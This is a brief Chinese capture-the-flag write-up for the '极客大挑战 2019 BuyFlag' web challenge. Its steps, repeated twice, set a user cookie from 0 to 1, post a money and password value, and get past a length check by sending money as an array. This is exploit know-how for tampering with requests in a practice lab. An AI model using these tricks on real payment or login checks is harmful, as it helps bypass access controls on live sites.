[极客大挑战 2019]BuyFlag
header里头有个user=0,将其修改成1
再post money=100000001&password=404a
发现money参数过长,使用数组绕过
最后post money[]=100000001&password=404a
header里头有个user=0,将其修改成1
再post money=100000001&password=404a
发现money参数过长,使用数组绕过
最后post money[]=100000001&password=404a